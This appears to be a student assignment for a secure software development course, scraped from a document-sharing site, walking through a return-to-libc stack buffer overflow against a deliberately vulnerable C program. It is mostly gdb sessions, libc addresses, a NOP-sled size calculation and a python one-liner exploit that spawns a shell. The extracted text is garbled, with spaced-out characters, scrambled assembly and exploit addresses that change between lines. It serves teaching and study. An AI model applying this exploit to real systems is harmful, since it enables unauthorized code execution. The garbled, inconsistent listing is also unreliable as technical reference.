Вы находитесь на странице: 1из 3

Author: Tyler Fisher Course: PROG 38263: Secure Software Development Topic: Assignment 7: return to libc attacks Date:

04/05/14 Return to libc attacks are a type of stack buffer overflow exploit that make use of functions from libc, the shared standard C library that is linked to most programs at runtime. This type of buffer overflow is used to bypass nonexecutable stack regions and execute arbitrary code. The following code will be used to demonstrate this type of vulnerability.
i n tm a i n ( i n ta r g c ,c h a r* a r g v [ ] ) { c h a rb u f f e r [ 1 2 8 ] ; i f ( a r g c>1 ) s t r c p y ( b u f f e r ,a r g v [ 1 ] ) ; }

( g d b )d i s a sm a i n D u m po fa s s e m b l e rc o d ef o rf u n c t i o nm a i n : 0 x 0 8 0 4 8 3 f d< + 0 > :p u s h 0 x 0 8 0 4 8 3 f e< + 1 > :m o v 0 x 0 8 0 4 8 4 0 0< + 3 > :s u b 0 x 0 8 0 4 8 4 0 6< + 9 > :c m p l 0 x 0 8 0 4 8 4 0 a< + 1 3 > : 0 x 0 8 0 4 8 4 0 c< + 1 5 > : 0 x 0 8 0 4 8 4 0 f< + 1 8 > : 0 x 0 8 0 4 8 4 1 2< + 2 1 > : 0 x 0 8 0 4 8 4 1 4< + 2 3 > : 0 x 0 8 0 4 8 4 1 8< + 2 7 > : 0 x 0 8 0 4 8 4 1 b< + 3 0 > : 0 x 0 8 0 4 8 4 1 e< + 3 3 > : 0 x 0 8 0 4 8 4 2 3< + 3 8 > : 0 x 0 8 0 4 8 4 2 4< + 3 9 > : E n do fa s s e m b l e rd u m p . % e b p % e s p , % e b p $ 0 x 8 8 , % e s p $ 0 x 1 , 0 x 8 ( % e b p ) 0 x 8 0 4 8 4 2 3< m a i n + 3 8 > 0 x c ( % e b p ) , % e a x $ 0 x 4 , % e a x ( % e a x ) , % e a x % e a x , 0 x 4 ( % e s p ) 0 x 8 0 ( % e b p ) , % e a x % e a x , ( % e s p ) 0 x 8 0 4 8 2 d 0< s t r c p y @ p l t > j l e m o v a d d m o v m o v l e a m o v c a l l l e a v e r e t

#O v e r f l o ws e r v e rb u f f e ra n ds e tr e t u r na d d r e s st oe x i t ( )s y s c a l l p r i n t f" % 0 2 4 x \ x 0 0 \ x 1 2 \ x 1 7 \ x 0 0 "|v i c t i m

( g d b )p r i n tp r i n t f $ 1={ < t e x tv a r i a b l e ,n od e b u gi n f o > }0 x f 7 e 3 b 4 1 0< p r i n t f > ( g d b )p r i n te x i t $ 2={ < t e x tv a r i a b l e ,n od e b u gi n f o > }0 x f 7 e 1 f 7 5 0< e x i t > ( g d b )p r i n ts y s t e m $ 3={ < t e x tv a r i a b l e ,n od e b u gi n f o > }0 x f 7 e 2 c a 7 0< s y s t e m >

Use an environment variable to store the parameter for the printf() syscall that will act as the payload.
$e x p o r tP A Y L O A D = " S M A S H "

( g d b )b r e a km a i n B r e a k p o i n t1a t0 x 8 0 4 8 6 d d :f i l es e r v e r . c ,l i n e2 9 . ( g d b )r u n ( g d b )x / 1 0 0 0 s$ e s p . . . 0 x f f f f d 7 7 4 :" G P G _ A G E N T _ I N F O = / r u n / u s e r / 1 0 0 0 / k e y r i n g 5 w b o C k / g p g : 0 : 1 "

0 x f f f f d 7 a 9 :" A N D R O I D _ S W T = / u s r / s h a r e / j a v a " 0 x f f f f d 7 c 5 :" S H E L L = / b i n / b a s h " 0 x f f f f d 7 d 5 :" T E R M = x t e r m " 0 x f f f f d 7 e 0 :" H I S T S I Z E = 1 0 0 " . . .

( g d b )x / s0 x f f f f d 7 c 5 0 x f f f f d 7 c 5 :" S H E L L = / b i n / b a s h " . . . ( g d b )x / s0 x f f f f d 7 c b 0 x f f f f d 7 c b :" / b i n / b a s h "

Therefore, in little endian notation: Address for system() is \ x 7 0 \ x c a \ x e 2 \ x f 7 Address for /bin/sh in $SHELL environment variable is: \ x c b \ x d 7 \ x f f \ x f f The payload consists of the return address for printf, the address of the exit() syscall in the server process, and the address for the $PAYLOAD environment variable
\ x 7 0 \ x c a \ x e 2 \ x f 7 S E X Y \ x c b \ x d 7 \ x f f \ x f f

The size of the NOP sled is the sum of the: Size of the buffer: 128 EBP pointer: 4 RET pointer: 4 Therefore: 136 bytes required to overflow the buffer. Represent this as a sled of 136 NOPs (0x90)
$g d bqa r g sv i c t i m` p y t h o n 2c' p r i n t" \ x 9 0 " * 1 3 6 ' ` R e a d i n gs y m b o l sf r o mv i c t i m . . . d o n e . ( g d b )r w a r n i n g :C o u l dn o tl o a ds h a r e dl i b r a r ys y m b o l sf o rl i n u x g a t e . s o . 1 . D oy o un e e d" s e ts o l i b s e a r c h p a t h "o r" s e ts y s r o o t " ? P r o g r a mr e c e i v e ds i g n a lS I G S E G V ,S e g m e n t a t i o nf a u l t . 0 x 9 0 9 0 9 0 9 0i n? ?( )

S t a r t i n gp r o g r a m :/ h o m e / b o b / s r c / s e c u r e _ c o d e _ d e v e l o p m e n t / a 6 / v i c t i m

Find location of exit() - \x50\xf7\xe1\xf7


( g d b )pe x i t $ 1={ < t e x tv a r i a b l e ,n od e b u gi n f o > }0 x f 7 e 1 f 7 5 0< e x i t >

Therefore, the exploit can be written as:


. / v i c t i m` p y t h o n 2c' p r i n t" \ x 9 0 " * 1 3 2 + " \ x 7 0 \ x c a \ x e 2 \ x f 7 \ x 5 0 \ x f 7 \ x e 1 \ x f 7 \ x 8 7 \ x d 7 \ x f f \ x f f " ' `

To verify that the exploit executed properly and spawned a shell:


[ n o t t @ n o t ta 6 ] $g d bqa r g sv i c t i m` p y t h o n 2c' p r i n t" \ x 9 0 " * 1 3 2 + " \ x 7 0 \ x c a \ x e 2 \ x f 7 \ x 5 0 \ x f 7 \ x e 1 \ x f 7 \ x 5 a \ x d 7 \ x f f \ x f f " ' ` R e a d i n gs y m b o l sf r o mv i c t i m . . . d o n e . ( g d b )r u n w a r n i n g :C o u l dn o tl o a ds h a r e dl i b r a r ys y m b o l sf o rl i n u x g a t e . s o . 1 . D oy o un e e d" s e ts o l i b s e a r c h p a t h "o r" s e ts y s r o o t " ? [ n o t t @ n o t ta 6 ] $

S t a r t i n gp r o g r a m :/ h o m e / n o t t / s r c / s e c u r e _ c o d e _ d e v e l o p m e n t / a 6 / v i c t i m

Since we're in the newly spawned shell, we might as well exit it.

[ n o t t @ n o t ta 6 ] $e x i t e x i t [ I n f e r i o r1( p r o c e s s1 8 9 6 1 )e x i t e dn o r m a l l y ] ( g d b )e x i t U n d e f i n e dc o m m a n d :" e x i t " . T r y" h e l p " . ( g d b )q u i t [ n o t t @ n o t ta 6 ] $

Return to libc exploit in action:

Вам также может понравиться